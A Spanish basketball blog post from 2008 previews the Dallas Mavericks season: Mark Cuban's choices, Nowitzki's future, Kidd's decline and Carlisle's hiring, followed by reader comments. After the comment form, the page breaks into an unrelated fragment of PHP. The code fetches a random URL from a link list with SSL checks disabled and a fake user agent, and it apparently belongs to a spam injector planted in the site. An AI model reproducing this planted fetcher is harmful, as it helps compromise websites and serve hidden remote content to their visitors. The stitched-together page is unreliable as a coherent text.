Dallas Mavericks: En tierra de nadie

23 de October de 2008 por Gallis

Hay equipos que lo tienen claro desde el principio: el Anillo es su único objetivo. Otros buscan seguir creciendo y avanzar una ronda más en Playoffs. Para algunos disputar la postemporada es un éxito por el que merece la pena luchar. Mientras, más de un equipo sabe que debe pensar a largo plazo y que el draft de 2009, que tan lejano queda ahora, será el punto álgido de su temporada. Sin embargo, si hay un equipo que no se podría encuadrar en ninguno de estos objetivos son los Dallas Mavericks. Para que los Mavs ganaran el anillo debería producirse una (improbable) debacle en cadena de no menos de 6 franquicias, y aún así no serían favoritos. Pasar a segunda ronda, algo que no hacen desde 2006, no puede ser considerado un éxito para esta franquicia. Clasificarse para los Playoffs es un objetivo muy al alcance de su mano, pero en ningún caso algo de lo que vanagloriarse. Y acabar eligiendo en los puestos de “honor” del draft sería un pésimo colofón a un proyecto construido para ganar el Anillo, que se autodestruyó en Miami, en el aquel terrible tercer partido de las finales de 2006 frente a los Heat.

Más allá de jugadores de grandísima calidad y de quién ocupe el banquillo de los Mavs, la figura que sobresale en la franquicia tejana es la de su propietario, Mark Cuban. De él y de nadie más que él depende el futuro de este equipo. El año pasado Cuban optó por huir hacía delante e hizo todo lo posible por hacerse con los servicios de Jason Kidd, una operación que no funcionó. Será muy interesante ver qué movimientos hace, o no, esta temporada. Movimientos que, es de suponer, sacarán al equipo del “limbo” en el que se encuentran en estos momentos, una situación más sangrante todavía si tenemos en cuenta que tan solo los Knicks y los Cavs pagan más dinero en salarios que Cuban. Eso sí, su primer movimiento ya está hecho. Nada más acabar la temporada Cuban despidió a Avery Johnson, algo tarde quizá, y apostó por Rick Carlisle. Es una apuesta arriesgada, ya que Carlise es uno de esos entrenadores que todo el mundo asocia con la costa este, amante de un juego lento, construido a partir de una gran defensa, pero algo había que hacer y será interesante ver cómo se adaptan a este nuevo estilo los Nowitzki y compañía.

Ya tardaba en salir el otro gran nombre de los Mavs, Dirk Nowitzki. Sin duda, más allá del futuro inmediato, Robin Hood es la gran preocupación que debe tener Mark Cuban. El alemán es el santo y seña del equipo, pero no parece el tipo de jugador dispuesto a vivir el resto de su carrera en esta indefinición. La mejor prueba de ello la dio la pasada temporada. Cuban echó el resto para traerle a Jason Kidd, y Nowitzki, convencido de estar ante su gran oportunidad, se jugó ni más ni menos que su carrera. En un partido contra los Spurs se produjo, a la vez, un esguince en la rodilla y en el tobillo. Una lesión que a muchos habría tenido un par de meses fuera de la canchas. Apenas 15 días después, el teutón ya estaba jugando y, lo que es más increíble, jugando al mejor nivel de la temporada. Se echó al equipo a las espaldas, en un momento en el que Denver y Golden State amenazaban su presencia en Playoffs y consiguió que los Mavs acabaran en séptima posición. Sin embargo, los Hornets fueron otra historia, y ahí quedó bastante claro que estos Mavs no están llamados a hacer grandes cosas. Desde luego, parece claro que Robin Hood está empeñado en ganar el anillo con los Mavs, pero si Cuban no se mueve, y muy rápido, quizá se encuentre con que Nowitzki, que acaba contrato dentro de 2 años, empieza a considerar la posibilidad de moverse.

Precisamente por petición expresa de Nowitzki, y dentro del mes de febrero más convulso de los últimos años, a mediados de la temporada pasada llegó (o mejor dicho, volvió) a Dallas Jason Kidd. Hace unos años, cuando Kidd le disputaba a Nash el título de mejor base de la liga, la pareja Kidd & Nowitzki habría despertado pavor entre sus rivales. Sin embargo, el campeón olímpico está claramente en el declive de su carrera y, desde su llegada al equipo, los Mavs tuvieron serios problemas para ganar a algún equipo de los que optaban a jugar la postemporada. La llegada de Carlisle puede afectar y mucho al juego de Kidd. Acostumbrado a correr durante toda su carrera, ahora deberá jugar más en estático, algo que no le favorece. Sin embargo, este ritmo lento le permitirá aumentar sus prestaciones en defensa y por ahí puede venir un poco de mejora para el equipo. Junto al rendimiento de Kidd, Josh Howard es otra de las grandes indefiniciones del equipo. Su llegada a Dallas en 2003 supuso la entrada de aire fresco en el equipo, pero a pesar de que sus números suben cada año (el año pasado firmó casi 20 puntos y 7 rebotes por partido), da la sensación de que su impacto en el juego del equipo es cada vez menor, sobre todo en los partidos importantes. Más preocupado por asuntos externos al juego (es uno de los más vigilados de la liga por el comité antidroga), si se centra y da un paso adelante Cuban tendrá un poco menos de trabajo en el futuro.

La segunda línea del equipo es una mezcla de veteranía, acomodamiento e irregularidad, con la excepción de Brandon Bass. Después de 2 años sin pena ni gloria en New Orleans, Bass aterrizó en Dallas y a base de esfuerzo y trabajo se hizo un hueco muy importante en el equipo. Será importante con Carlisle con total seguridad. Más dudas ofrece el rendimiento de Jason Terry, Jerry Stackhouse y Erick Dampier, 3 jugadores que cuando están en racha siguen jugando a un gran nivel, pero cada vez tienen esas rachas menos frecuentemente. Si alguno de ellos encuentra la regularidad Dallas crecerá, pero parece poco probable. Devean George, Desagana Diop, Antoine Wright o Jose Barea completan una pobre rotación en la que destacan otros 2 nombres: Gerald Green, que vuelve a tener una oportunidad en la liga, y el ex del TAU James Singleton. Así las cosas, ni la mejor versión posible de cada jugador hace pensar que estos Mavs puedan aspirar a algo más que dar guerra en primera ronda. Sólo queda saber qué hará Mark Cuban al respecto. Reconstruir el equipo no parece probable, ya que salarialmente está muy hipotecado y además, peligraría la presencia de Nowitzki. Quedarse como está tampoco parece muy recomendable. Y, salvo ofertón por el expiring de Kidd al nivel del Kwame por Gasol, tampoco parece muy fácil avanzar significativamente de aquí a febrero vía trade. Papelón, pues, el que le espera a Cuban.

Quinteto inicial: Jason Kidd, Jason Terry, Josh Howard, Dirk Nowitzki y Erick Dampier.

Sexto hombre: Jerry Stackhouse

Pronóstico: Primera ronda de Playoffs

Comenta

9 comentarios a esta entrada

  1. Txusma dice:
    #1

    Totalmente de acuerdo con el analisis. De los 4 grandes equipos “veteranos” que seguiran dando guerra esta temporada (Boston, SA, Detroit y Dallas) son a los que veo con menos recorrido son a los que veo con menos recorrido y con su final más cerca. Es mas me juego q esta sera su ultima temporada en Playoffs en bastante tiempo y que ni tan siquiera un “Kwame x Gasol” arreglara la situación. En el 2010 Dirk sera otro de los grandes agentes libres en el mercado casi con toda seguridad.

      Citar

  2. portu dice:
    #2

    Tb de acuerdo en el análisis de Gallis, pero creo q si Cuban continua con la huida hacia adelante ésta será probablemente la última o penúltima oportunidad con Dirk a su mejor nivel. Lo q puede llegar este año supongo q son las pseudoestrellas sobrepagadas tipo Zach, Odom, Carter o Marion, pero curiosamente, un tío versátil como Marion u Odom, o bien, una 2ª amenaza ofensiva como Carter o Zach yo sí creo q podrían combinar con Dirk, incluso más q la llegada de Kidd. Salvo asumir esos salarios sobredimensionados no sé si Dallas puede ofrecer algo más, pero viendo el precio NBA de Camby por poner un ejemplo, yo de Cuban no me esperaría a Febrero para realizar movimientos.

      Citar

  3. Hynreck dice:
    #3

    Yo creo que este equipo no murió en Miami, sino en Oackland, a partir de ahí vino el declive, cabe recordar que aquella temporada habían perdido 14 partidos en la regular nada más.

      Citar

  4. MagicJohnson32 dice:
    #4

    Bueno, en Miami murió, y en Oackland le hicieron la autopsia 😀

    Pues sí, de acuerdo con Gallis. Siguen siendo peligrosos, claro, pero nadie los consideraría candidatos reales a las Finales. Curioso lo de los bases en Dallas ¿no?

      Citar

  5. TheDeerHunter dice:
    #5

    Juer… En miami fue un simple revés del que parecía se habían recuperado de sobra al año siguiente. Lo de los Believers sí fue un harakiri en toda regla.

    No caigo ahora… ¿qué pasa con los bases en Dallas??

      Citar

  6. MagicJohnson32 dice:
    #6

    Pues que Nash tuvo que irse de Dallas para convertirse en el mejor base del mundo. Y antes, Kidd se había ido tras fracasar el proyecto de las 3 J’s, y ahora que vuelve parece Kevin Ollie y tiene toda la pinta de que no van a ninguna parte.

      Citar

  7. Viva_Dirk dice:
    #7

    Yo no los veo tan mal, aunque claro, por algo soy Viva_Dirk, jeje. En serio, tienen un dueño dispuesto a gastarse la pasta, un entrenador consagrado y una superestrella. Kidd-Terry-Howard-Dirk-Dampier, con Bass, Stackhouse y Diop en el banco es un buen equipo, tienen la esperanza de G.Green, desde luego si explota se encuentran un sorpresón, pero aun sin contar con eso, con ese equipo, Cuban tiene opciones que mover y lo hará seguro.

    Si acaban entre los 4 primeros, y con Carlisle lo veo muy factible, los veo mínimo en 2ª ronda.

      Citar

  8. Gallis dice:
    #8

    Hombre, Deer, perder un anillo cuando ganabas 2-0 y tenías el tercer partido controlado a falta de 6 minutos es algo más que un simple revés. Yo creo que eso tuvo muchísimo que ver en lo de los Playoffs del año siguiente. Vamos, con un anillo en la mano, ni “We Believe” ni leches en vinagre…probablemente tendrían 2 anillos…

      Citar

  9. Jabho dice:
    #9

    De acuerdo con el análisis pero ahora es cuando mas peligroso son Dallas. Nadie espera nada de ellos y la presión es para el resto.Son un equipo que ha demostrado llevar mal la presión…

    Creo que además mejoraran con el cambio de entrandor.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>